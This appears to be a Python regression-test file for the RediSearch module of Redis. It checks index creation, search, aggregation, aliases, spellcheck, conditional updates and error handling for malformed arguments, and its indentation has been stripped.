# >FT.SEARCH myIdx "no-as"
# Could not connect to Redis at 127.0.0.1:6379: Connection refused
# >FT.SEARCH myIdx "no-as"
# (error) Unknown Index name
def testIssue422(env):
env.cmd('ft.create', 'myIdx', 'schema',
'title', 'TEXT', 'WEIGHT', '5.0',
'body', 'TEXT',
'url', 'TEXT')
env.cmd('ft.add', 'myIdx', 'doc1', '1.0', 'FIELDS', 'title', 'hello world', 'bod', 'lorem ipsum', 'url', 'www.google.com')
rv = env.cmd('ft.search', 'myIdx', 'no-as')
env.assertEqual([0], rv)
def testIssue446(env):
env.cmd('ft.create', 'myIdx', 'schema',
'title', 'TEXT', 'SORTABLE')
env.cmd('ft.add', 'myIdx', 'doc1', '1.0', 'fields', 'title', 'hello world', 'body', 'lorem ipsum', 'url', '"www.google.com')
rv = env.cmd('ft.search', 'myIdx', 'hello', 'limit', '0', '0')
env.assertEqual([1], rv)
# Related - issue 635
env.cmd('ft.add', 'myIdx', 'doc2', '1.0', 'fields', 'title', 'hello')
rv = env.cmd('ft.search', 'myIdx', 'hello', 'limit', '0', '0')
env.assertEqual([2], rv)
def testTimeoutSettings(env):
env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'BLAHBLAH').raiseError()
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'RETURN').notRaiseError()
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'FAIL').notRaiseError()
def testAlias(env):
env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
env.cmd('ft.create', 'idx2', 'schema', 't1', 'text')
env.expect('ft.aliasAdd', 'myIndex').raiseError()
env.expect('ft.aliasupdate', 'fake_alias', 'imaginary_alias', 'Too_many_args').raiseError()
env.cmd('ft.aliasAdd', 'myIndex', 'idx')
env.cmd('ft.add', 'myIndex', 'doc1', 1.0, 'fields', 't1', 'hello')
r = env.cmd('ft.search', 'idx', 'hello')
env.assertEqual([1, 'doc1', ['t1', 'hello']], r)
r2 = env.cmd('ft.search', 'myIndex', 'hello')
env.assertEqual(r, r2)
# try to add the same alias again; should be an error
env.expect('ft.aliasAdd', 'myIndex', 'idx2').raiseError()
env.expect('ft.aliasAdd', 'alias2', 'idx').notRaiseError()
# now delete the index
env.cmd('ft.drop', 'myIndex')
# index list should be cleared now. This can be tested by trying to alias
# the old alias to different index
env.cmd('ft.aliasAdd', 'myIndex', 'idx2')
env.cmd('ft.aliasAdd', 'alias2', 'idx2')
env.cmd('ft.add', 'myIndex', 'doc2', 1.0, 'fields', 't1', 'hello')
r = env.cmd('ft.search', 'alias2', 'hello')
env.assertEqual([1L, 'doc2', ['t1', 'hello']], r)
# check that aliasing one alias to another returns an error. This will
# end up being confusing
env.expect('ft.aliasAdd', 'alias3', 'myIndex').raiseError()
# check that deleting the alias works as expected
env.expect('ft.aliasDel', 'myIndex').notRaiseError()
env.expect('ft.search', 'myIndex', 'foo').raiseError()
# create a new index and see if we can use the old name
env.cmd('ft.create', 'idx3', 'schema', 't1', 'text')
env.cmd('ft.add', 'idx3', 'doc3', 1.0, 'fields', 't1', 'foo')
env.cmd('ft.aliasAdd', 'myIndex', 'idx3')
# also, check that this works in rdb save
for _ in env.retry_with_rdb_reload():
r = env.cmd('ft.search', 'myIndex', 'foo')
env.assertEqual([1L, 'doc3', ['t1', 'foo']], r)
# Check that we can move an alias from one index to another
env.cmd('ft.aliasUpdate', 'myIndex', 'idx2')
r = env.cmd('ft.search', 'myIndex', "hello")
env.assertEqual([1L, 'doc2', ['t1', 'hello']], r)
# Test that things like ft.get, ft.aggregate, etc. work
r = env.cmd('ft.get', 'myIndex', 'doc2')
env.assertEqual(['t1', 'hello'], r)
r = env.cmd('ft.aggregate', 'myIndex', 'hello', 'LOAD', '1', '@t1')
env.assertEqual([1, ['t1', 'hello']], r)
# Test update
env.expect('ft.aliasAdd', 'updateIndex', 'idx3')
env.expect('ft.aliasUpdate', 'updateIndex', 'fake_idx')
r = env.cmd('ft.del', 'idx2', 'doc2')
env.assertEqual(1, r)
env.expect('ft.aliasdel').raiseError()
env.expect('ft.aliasdel', 'myIndex', 'yourIndex').raiseError()
env.expect('ft.aliasdel', 'non_existing_alias').raiseError()
def testNoCreate(env):
env.cmd('ft.create', 'idx', 'schema', 'f1', 'text')
env.expect('ft.add', 'idx', 'schema', 'f1').raiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'nocreate', 'fields', 'f1', 'hello').raiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'nocreate', 'fields', 'f1', 'hello').raiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'fields', 'f1', 'hello').notRaiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'nocreate', 'fields', 'f1', 'world').notRaiseError()
def testSpellCheck(env):
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'report', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc1', 1.0, 'FIELDS', 'report', 'report content')
rv = env.cmd('FT.SPELLCHECK', 'idx', '111111')
env.assertEqual([['TERM', '111111', []]], rv)
if not env.isCluster():
rv = env.cmd('FT.SPELLCHECK', 'idx', '111111', 'FULLSCOREINFO')
env.assertEqual([1L, ['TERM', '111111', []]], rv)
# Standalone functionality
def testIssue484(env):
# Issue with split
# 127.0.0.1:6379> ft.drop productSearch1
# OK
# 127.0.0.1:6379> "FT.CREATE" "productSearch1" "NOSCOREIDX" "SCHEMA" "productid" "TEXT" "categoryid" "TEXT" "color" "TEXT" "timestamp" "NUMERIC"
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID1" "1.0" "REPLACE" "FIELDS" "productid" "1" "categoryid" "cars" "color" "blue" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID2" "1.0" "REPLACE" "FIELDS" "productid" "1" "categoryid" "small cars" "color" "white" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID3" "1.0" "REPLACE" "FIELDS" "productid" "2" "categoryid" "Big cars" "color" "white" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID4" "1.0" "REPLACE" "FIELDS" "productid" "2" "categoryid" "Big cars" "color" "green" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID5" "1.0" "REPLACE" "FIELDS" "productid" "3" "categoryid" "cars" "color" "blue" "categoryType" 0
# OK
# 127.0.0.1:6379> FT.AGGREGATE productSearch1 * load 2 @color @categoryid APPLY "split(format(\"%s-%s\",@color,@categoryid),\"-\")" as value GROUPBY 1 @value REDUCE COUNT 0 as value_count
env.cmd('ft.create', 'productSearch1', 'noscoreidx', 'schema', 'productid',
'text', 'categoryid', 'text', 'color', 'text', 'timestamp', 'numeric')
env.cmd('ft.add', 'productSearch1', 'GUID1', '1.0', 'REPLACE', 'FIELDS', 'productid', '1', 'categoryid', 'cars', 'color', 'blue', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID2', '1.0', 'REPLACE', 'FIELDS', 'productid', '1', 'categoryid', 'small cars', 'color', 'white', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID3', '1.0', 'REPLACE', 'FIELDS', 'productid', '2', 'categoryid', 'Big cars', 'color', 'white', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID4', '1.0', 'REPLACE', 'FIELDS', 'productid', '2', 'categoryid', 'Big cars', 'color', 'green', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID5', '1.0', 'REPLACE', 'FIELDS', 'productid', '3', 'categoryid', 'cars', 'color', 'blue', 'categoryType', 0)
res = env.cmd('FT.AGGREGATE', 'productSearch1', '*',
'load', '2', '@color', '@categoryid',
'APPLY', 'split(format("%s-%s",@color,@categoryid),"-")', 'as', 'value',
'GROUPBY', '1', '@value',
'REDUCE', 'COUNT', '0', 'as', 'value_count',
'SORTBY', '4', '@value_count', 'DESC', '@value', 'ASC')
expected = [6, ['value', 'white', 'value_count', '2'], ['value', 'cars', 'value_count', '2'], ['value', 'small cars', 'value_count', '1'], ['value', 'blue', 'value_count', '2'], ['value', 'Big cars', 'value_count', '2'], ['value', 'green', 'value_count', '1']]
assertAggrowsEqual(env, expected, res)
for var in expected:
env.assertIn(var, res)
def testIssue501(env):
env.cmd('FT.CREATE', 'incidents', 'SCHEMA', 'report', 'TEXT')
env.cmd('FT.ADD', 'incidents', 'doc1', 1.0, 'FIELDS', 'report', 'report content')
env.cmd('FT.DICTADD', 'slang', 'timmies', 'toque', 'toonie', 'serviette', 'kerfuffle', 'chesterfield')
rv = env.cmd('FT.SPELLCHECK', 'incidents', 'qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq',
'TERMS', 'INCLUDE', 'slang', 'TERMS', 'EXCLUDE', 'slang')
env.assertEqual("qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq", rv[0][1])
env.assertEqual([], rv[0][2])
env.expect('FT.SPELLCHECK', 'incidents', 'qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq',
'TERMS', 'FAKE_COMMAND', 'slang').error()
def testIssue589(env):
env.cmd('FT.CREATE', 'incidents', 'SCHEMA', 'report', 'TEXT')
env.cmd('FT.ADD', 'incidents', 'doc1', 1.0, 'FIELDS', 'report', 'report content')
env.expect('FT.SPELLCHECK', 'incidents', 'report :').error().contains("Syntax error at offset")
def testIssue621(env):
env.expect('ft.create', 'test', 'SCHEMA', 'uuid', 'TAG', 'title', 'TEXT').equal('OK')
env.expect('ft.add', 'test', 'a', '1', 'REPLACE', 'PARTIAL', 'FIELDS', 'uuid', 'foo', 'title', 'bar').equal('OK')
env.expect('ft.add', 'test', 'a', '1', 'REPLACE', 'PARTIAL', 'FIELDS', 'title', 'bar').equal('OK')
env.expect('ft.search', 'test', '@uuid:{foo}').equal([1L, 'a', ['uuid', 'foo', 'title', 'bar']])
# Server crash on doc names that conflict with index keys #666
def testIssue666(env):
# We cannot reliably determine that any error will occur in cluster mode
# because of the key name
env.skipOnCluster()
env.cmd('ft.create', 'foo', 'schema', 'bar', 'text')
env.cmd('ft.add', 'foo', 'mydoc', 1, 'fields', 'bar', 'one two three')
# crashes here
with env.assertResponseError():
env.cmd('ft.add', 'foo', 'ft:foo/two', '1', 'fields', 'bar', 'four five six')
# try with replace:
with env.assertResponseError():
env.cmd('ft.add', 'foo', 'ft:foo/two', '1', 'REPLACE',
'FIELDS', 'bar', 'four five six')
with env.assertResponseError():
env.cmd('ft.add', 'foo', 'idx:foo', '1', 'REPLACE',
'FIELDS', 'bar', 'four five six')
env.cmd('ft.add', 'foo', 'mydoc1', 1, 'fields', 'bar', 'four five six')
# 127.0.0.1:6379> flushdb
# OK
# 127.0.0.1:6379> ft.create foo SCHEMA bar text
# OK
# 127.0.0.1:6379> ft.add foo mydoc 1 FIELDS bar "one two three"
# OK
# 127.0.0.1:6379> keys *
# 1) "mydoc"
# 2) "ft:foo/one"
# 3) "idx:foo"
# 4) "ft:foo/two"
# 5) "ft:foo/three"
# 127.0.0.1:6379> ft.add foo "ft:foo/two" 1 FIELDS bar "four five six"
# Could not connect to Redis at 127.0.0.1:6379: Connection refused
def testPrefixDeletedExpansions(env):
env.skipOnCluster()
env.cmd('ft.create', 'idx', 'schema', 'txt1', 'text', 'tag1', 'tag')
# get the number of maximum expansions
maxexpansions = int(env.cmd('ft.config', 'get', 'MAXEXPANSIONS')[0][1])
for x in range(maxexpansions):
env.cmd('ft.add', 'idx', 'doc{}'.format(x), 1, 'fields',
'txt1', 'term{}'.format(x), 'tag1', 'tag{}'.format(x))
for x in range(maxexpansions):
env.cmd('ft.del', 'idx', 'doc{}'.format(x))
env.cmd('ft.add', 'idx', 'doc_XXX', 1, 'fields', 'txt1', 'termZZZ', 'tag1', 'tagZZZ')
# r = env.cmd('ft.search', 'idx', 'term*')
# print(r)
# r = env.cmd('ft.search', 'idx', '@tag1:{tag*}')
# print(r)
tmax = time.time() + 0.5 # 250ms max
iters = 0
while time.time() < tmax:
iters += 1
env.cmd('ft.debug', 'gc_forceinvoke', 'idx')
r = env.cmd('ft.search', 'idx', '@txt1:term* @tag1:{tag*}')
if r[0]:
break
print 'did {} iterations'.format(iters)
r = env.cmd('ft.search', 'idx', '@txt1:term* @tag1:{tag*}')
env.assertEqual([1, 'doc_XXX', ['txt1', 'termZZZ', 'tag1', 'tagZZZ']], r)
def testOptionalFilter(env):
env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
for x in range(100):
env.cmd('ft.add', 'idx', 'doc_{}'.format(x), 1, 'fields', 't1', 'hello world word{}'.format(x))
env.cmd('ft.explain', 'idx', '(~@t1:word20)')
# print(r)
r = env.cmd('ft.search', 'idx', '~(word20 => {$weight: 2.0})')
def testIssue736(env):
# 1. create the schema, we need a tag field
env.cmd('ft.create', 'idx', 'schema', 't1', 'text', 'n2', 'numeric', 't2', 'tag')
# 2. create a single document to initialize at least one RSAddDocumentCtx
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 't1', 'hello', 't2', 'foo, bar')
# 3. create a second document with many filler fields to force a realloc:
extra_fields = []
for x in range(20):
extra_fields += ['nidx_fld{}'.format(x), 'val{}'.format(x)]
extra_fields += ['n2', 'not-a-number', 't2', 'random, junk']
with env.assertResponseError():
env.cmd('ft.add', 'idx', 'doc2', 1, 'fields', *extra_fields)
def testCriteriaTesterDeactivated():
env = Env(moduleArgs='_MAX_RESULTS_TO_UNSORTED_MODE 1')
env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 't1', 'hello1 hey hello2')
env.cmd('ft.add', 'idx', 'doc2', 1, 'fields', 't1', 'hello2 hey')
env.cmd('ft.add', 'idx', 'doc3', 1, 'fields', 't1', 'hey')
env.expect('ft.search', 'idx', '(hey hello1)|(hello2 hey)').equal([2L, 'doc1', ['t1', 'hello1 hey hello2'], 'doc2', ['t1', 'hello2 hey']])
def testIssue828(env):
env.cmd('ft.create', 'beers', 'SCHEMA',
'name', 'TEXT', 'PHONETIC', 'dm:en',
'style', 'TAG', 'SORTABLE',
'abv', 'NUMERIC', 'SORTABLE')
rv = env.cmd("FT.ADD", "beers", "802", "1.0",
"FIELDS", "index", "25", "abv", "0.049",
"name", "Hell or High Watermelon Wheat (2009)",
"style", "Fruit / Vegetable Beer")
env.assertEqual('OK', rv)
def testIssue862(env):
env.cmd('ft.create', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE')
rv = env.cmd("FT.ADD", "idx", "doc1", "1.0", "FIELDS", "test", "foo")
env.assertEqual('OK', rv)
env.cmd("FT.SEARCH", "idx", "foo", 'WITHSORTKEYS')
env.assertTrue(env.isUp())
def testIssue_884(env):
env.expect('FT.create', 'idx', 'STOPWORDS', '0', 'SCHEMA', 'title', 'text', 'weight',
'50', 'subtitle', 'text', 'weight', '10', 'author', 'text', 'weight',
'10', 'description', 'text', 'weight', '20').equal('OK')
env.expect('FT.ADD', 'idx', 'doc4', '1.0', 'FIELDS', 'title', 'mohsin conversation the conversation tahir').equal('OK')
env.expect('FT.ADD', 'idx', 'doc3', '1.0', 'FIELDS', 'title', 'Fareham Civilization Church - Sermons and conversations mohsin conversation the').equal('OK')
env.expect('FT.ADD', 'idx', 'doc2', '1.0', 'FIELDS', 'title', 'conversation the conversation - a drama about conversation, the science of conversation.').equal('OK')
env.expect('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 'title', 'mohsin conversation with the mohsin').equal('OK')
expected = [2L, 'doc2', ['title', 'conversation the conversation - a drama about conversation, the science of conversation.'], 'doc4', ['title', 'mohsin conversation the conversation tahir']]
res = env.cmd('FT.SEARCH', 'idx', '@title:(conversation) (@title:(conversation the conversation))=>{$inorder: true;$slop: 0}')
env.assertEquals(len(expected), len(res))
for v in expected:
env.assertContains(v, res)
def testIssue_866(env):
env.expect('ft.sugadd', 'sug', 'test123', '1').equal(1)
env.expect('ft.sugadd', 'sug', 'test456', '1').equal(2)
env.expect('ft.sugdel', 'sug', 'test').equal(0)
env.expect('ft.sugget', 'sug', '').equal(['test123', 'test456'])
def testIssue_848(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test1', 'TEXT', 'SORTABLE').equal('OK')
env.expect('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 'test1', 'foo').equal('OK')
env.expect('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'test2', 'TEXT', 'SORTABLE').equal('OK')
env.expect('FT.ADD', 'idx', 'doc2', '1.0', 'FIELDS', 'test1', 'foo', 'test2', 'bar').equal('OK')
env.expect('FT.SEARCH', 'idx', 'foo', 'SORTBY', 'test2', 'ASC').equal([2L, 'doc1', ['test1', 'foo'], 'doc2', ['test2', 'bar', 'test1', 'foo']])
def testMod_309(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
for i in range(100000):
env.expect('FT.ADD', 'idx', 'doc%d'%i, '1.0', 'FIELDS', 'test', 'foo').equal('OK')
res = env.cmd('FT.AGGREGATE', 'idx', 'foo')
env.assertEqual(len(res), 100001)
def testIssue_865(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', '1', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', '1', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', '1', 'foo2').equal('OK')
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', '1', 'ASC').equal([2, 'doc1', ['1', 'foo1'], 'doc2', ['1', 'foo2']])
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', '1', 'DESC').equal([2, 'doc2', ['1', 'foo2'], 'doc1', ['1', 'foo1']])
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', '1', 'bad').error()
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', 'bad', 'bad').error()
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', 'bad').error()
env.expect('ft.search', 'idx', 'foo*', 'SORTBY').error()
def testIssue_779(env):
# FT.ADD should return NOADD and not change the doc if value < same_value, but it returns OK and makes the change.
# Note that "greater than" ">" does not have the same bug.
env.cmd('FT.CREATE idx2 SCHEMA ot1 TAG')
env.cmd('FT.ADD idx2 doc2 1.0 FIELDS newf CAT ot1 4001')
env.expect('FT.GET idx2 doc2').equal(["newf", "CAT", "ot1", "4001"])
# NOADD is expected since 4001 is not < 4000, and no updates to the doc2 is expected as a result
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<4000 FIELDS newf DOG ot1 4000', 'NOADD')
env.expect('FT.GET idx2 doc2').equal(["newf", "CAT", "ot1", "4001"])
# OK is expected since 4001 < 4002 and the doc2 is updated
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<4002 FIELDS newf DOG ot1 4002').equal('OK')
env.expect('FT.GET idx2 doc2').equal(["newf", "DOG", "ot1", "4002"])
# OK is NOT expected since 4002 is not < 4002
# We expect NOADD and doc2 update; however, we get OK and doc2 updated
# After fix, @ot1 implicitly converted to a number, thus we expect NOADD
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<4002 FIELDS newf FISH ot1 4002').equal('NOADD')
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if to_number(@ot1)<4002 FIELDS newf FISH ot1 4002').equal('NOADD')
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<to_str(4002) FIELDS newf FISH ot1 4002').equal('NOADD')
env.expect('FT.GET idx2 doc2').equal(["newf", "DOG", "ot1", "4002"])
# OK and doc2 update is expected since 4002 < 4003
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<4003 FIELDS newf HORSE ot1 4003').equal('OK')
env.expect('FT.GET idx2 doc2').equal(["newf", "HORSE", "ot1", "4003"])
# Expect NOADD since 4003 is not > 4003
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1>4003 FIELDS newf COW ot1 4003').equal('NOADD')
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if 4003<@ot1 FIELDS newf COW ot1 4003').equal('NOADD')
# Expect OK and doc2 updated since 4003 > 4002
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1>4002 FIELDS newf PIG ot1 4002').equal('OK')
env.expect('FT.GET idx2 doc2').equal(["newf", "PIG", "ot1", "4002"])
# Syntax errors
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<4-002 FIELDS newf DOG ot1 4002').contains('Syntax error')
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<to_number(4-002) FIELDS newf DOG ot1 4002').contains('Syntax error')
def testUnknownSymbolErrorOnConditionalAdd(env):
env.expect('FT.CREATE idx SCHEMA f1 TAG f2 NUMERIC NOINDEX f3 TAG NOINDEX').ok()
env.expect('ft.add idx doc1 1.0 REPLACE PARTIAL IF @f1<awfwaf FIELDS f1 foo f2 1 f3 boo').ok()
env.expect('ft.add idx doc1 1.0 REPLACE PARTIAL IF @f1<awfwaf FIELDS f1 foo f2 1 f3 boo').error()
def testDelIndexExternally(env):
env.skipOnCluster() # todo: remove once fix on coordinator
env.expect('FT.CREATE idx SCHEMA num NUMERIC t TAG g GEO').equal('OK')
env.expect('ft.add idx doc1 1.0 FIELDS num 3 t my_tag g', "1,1").equal('OK')
env.expect('set nm:idx/num 1').equal('OK')
env.expect('ft.add idx doc2 1.0 FIELDS num 3').equal('Could not open numeric index for indexing')
env.expect('set tag:idx/t 1').equal('OK')
env.expect('ft.add idx doc3 1.0 FIELDS t 3').equal('Could not open tag index for indexing')
env.expect('set geo:idx/g 1').equal('OK')
env.expect('ft.add idx doc4 1.0 FIELDS g "1,1"').equal('Could not index geo value')
def testWrongResultsReturnedBySkipOptimization(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'f1', 'TEXT', 'f2', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'f1', 'foo', 'f2', 'bar').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'f1', 'moo', 'f2', 'foo').equal('OK')
env.expect('ft.search', 'idx', 'foo @f2:moo').debugPrint().equal([0L])
def testErrorWithApply(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo bar').equal('OK')
err = env.cmd('FT.AGGREGATE', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'split()')[1]
env.assertEqual(str(err[0]), 'Invalid number of arguments for split')
def testSummerizeWithAggregateRaiseError(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.aggregate', 'idx', 'foo2', 'SUMMARIZE', 'FIELDS', '1', 'test',
'GROUPBY', '1', '@test', 'REDUCE', 'COUNT', '0').error()
def testSummerizeHighlightParseError(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.search', 'idx', 'foo2', 'SUMMARIZE', 'FIELDS', 'WITHSCORES').error()
env.expect('ft.search', 'idx', 'foo2', 'HIGHLIGHT', 'FIELDS', 'WITHSCORES').error()
def testCursorBadArgument(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.aggregate', 'idx', '*',
'GROUPBY', '1', '@test', 'REDUCE', 'COUNT', '0',
'WITHCURSOR', 'COUNT', 'BAD').error()
def testLimitBadArgument(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.search', 'idx', '*', 'LIMIT', '1').error()
def testOnTimeoutBadArgument(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'bad').error()
def testAggregateSortByWrongArgument(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'SORTBY', 'bad').error()
def testAggregateSortByMaxNumberOfFields(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA',
'test1', 'TEXT', 'SORTABLE',
'test2', 'TEXT', 'SORTABLE',
'test3', 'TEXT', 'SORTABLE',
'test4', 'TEXT', 'SORTABLE',
'test5', 'TEXT', 'SORTABLE',
'test6', 'TEXT', 'SORTABLE',
'test7', 'TEXT', 'SORTABLE',
'test8', 'TEXT', 'SORTABLE',
'test9', 'TEXT', 'SORTABLE'
).equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'SORTBY', '9', *['@test%d' % (i + 1) for i in range(9)]).error()
args = ['@test%d' % (i + 1) for i in range(8)] + ['bad']
env.expect('ft.aggregate', 'idx', '*', 'SORTBY', '9', *args).error()
args = ['@test%d' % (i + 1) for i in range(8)] + ['ASC', 'MAX', 'bad']
env.expect('ft.aggregate', 'idx', '*', 'SORTBY', '9', *args).error()
args = ['@test%d' % (i + 1) for i in range(8)] + ['ASC', 'MAX']
env.expect('ft.aggregate', 'idx', '*', 'SORTBY', '9', *args).error()
def testNumericFilterError(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'NUMERIC', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '1').equal('OK')
env.expect('ft.search', 'idx', '*', 'FILTER', 'test', 'bad', '2').error()
env.expect('ft.search', 'idx', '*', 'FILTER', 'test', '0', 'bad').error()
env.expect('ft.search', 'idx', '*', 'FILTER', 'test', '0').error()
env.expect('ft.search', 'idx', '*', 'FILTER', 'test', 'bad').error()
env.expect('ft.search', 'idx', '*', 'FILTER', 'test', '0', '2', 'FILTER', 'test', '0', 'bla').error()
def testGeoFilterError(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'NUMERIC', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '1').equal('OK')
env.expect('ft.search', 'idx', '*', 'GEOFILTER', 'test', '1').error()
env.expect('ft.search', 'idx', '*', 'GEOFILTER', 'test', 'bad' , '2', '3', 'km').error()
env.expect('ft.search', 'idx', '*', 'GEOFILTER', 'test', '1' , 'bad', '3', 'km').error()
env.expect('ft.search', 'idx', '*', 'GEOFILTER', 'test', '1' , '2', 'bad', 'km').error()
env.expect('ft.search', 'idx', '*', 'GEOFILTER', 'test', '1' , '2', '3', 'bad').error()
def testReducerError(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'NUMERIC', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '1').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'GROUPBY', '1', '@test', 'REDUCE', 'COUNT', 'bad').error()
env.expect('ft.aggregate', 'idx', '*', 'GROUPBY', '1', '@test', 'REDUCE', 'COUNT', '0', 'as').error()
def testGroupbyError(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'NUMERIC', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '1').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'GROUPBY', '1', '@test', 'REDUCE').error()
if not env.isCluster(): # todo: remove once fix on coordinator
env.expect('ft.aggregate', 'idx', '*', 'GROUPBY', '1', '@test1').error()
env.expect('ft.aggregate', 'idx', '*', 'GROUPBY', '1', '@test', 'REDUCE', 'bad', '0').error()
